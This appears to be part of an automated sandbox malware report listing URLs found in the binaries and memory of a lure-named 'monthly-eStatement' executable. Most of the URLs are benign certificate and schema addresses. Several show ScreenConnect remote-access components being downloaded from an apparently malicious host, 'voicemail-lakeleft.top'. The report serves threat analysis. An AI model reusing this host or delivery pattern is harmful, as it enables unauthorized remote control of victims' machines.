                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000002.00000002.2983442666.0000025D39651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabA
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enS
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-8
                  Source: svchost.exe, 00000007.00000002.3289318932.0000021CA2E67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261953999.0000021CA2E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2230100183.0000021CA2708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
                  Source: svchost.exe, 00000007.00000003.2247242925.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2211022757.0000021CA270F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180029091.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2247172340.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159753613.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230521797.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230497548.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261678290.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288647499.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180103259.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195977302.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261895175.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230100183.0000021CA2708000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159831592.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2210994178.0000021CA2707000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159724549.0000021CA270E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA
                  Source: svchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdware
                  Source: svchost.exe, 00000007.00000003.2120640258.0000021CA2E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2210994178.0000021CA2707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
                  Source: svchost.exe, 00000007.00000003.2247242925.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2211022757.0000021CA270F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180029091.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2247172340.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159753613.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230521797.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230497548.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261678290.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288647499.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180103259.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195977302.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261895175.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230100183.0000021CA2708000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159831592.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2210994178.0000021CA2707000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159724549.0000021CA270E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAA
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdware
                  Source: svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/28
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: dfsvc.exe, 00000002.00000002.2981098182.0000025D365DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35E86000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                  Source: dfsvc.exe, 00000002.00000002.2982604639.0000025D395A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000007.00000002.3289021215.0000021CA2E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287754329.0000021CA1E81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288225105.0000021CA1EEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3289318932.0000021CA2E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyc
                  Source: svchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc.com
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scr
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
                  Source: svchost.exe, 00000007.00000002.3288119180.0000021CA1ED3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustf1p
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D6CA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.3289893133.0000000001FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://voicemail-lakeleft.top
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: monthly-eStatementForum120478962.Client.exe, 00000000.00000002.2258446760.0000000000B9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/I
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DCB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DCD6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DD3C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DCB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806014
                  Source: svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000003.2075651104.0000021CA2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwamvice
                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationre=msil
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2450825979.000000001B8AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_4c015cY
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_ecture=msil;
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationt
                  Source: dfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2447762978.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, S5L60WDT.log.2.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000002.00000002.2981524853.0000025D37CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest$
                  Source: dfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest:
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientSer
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000002.00000002.2981524853.0000025D37CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll6
                  Source: dfsvc.exe, 00000002.00000002.2981524853.0000025D37CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll~
                  Source: dfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exeG
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000002.00000002.2981594079.0000025D37CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
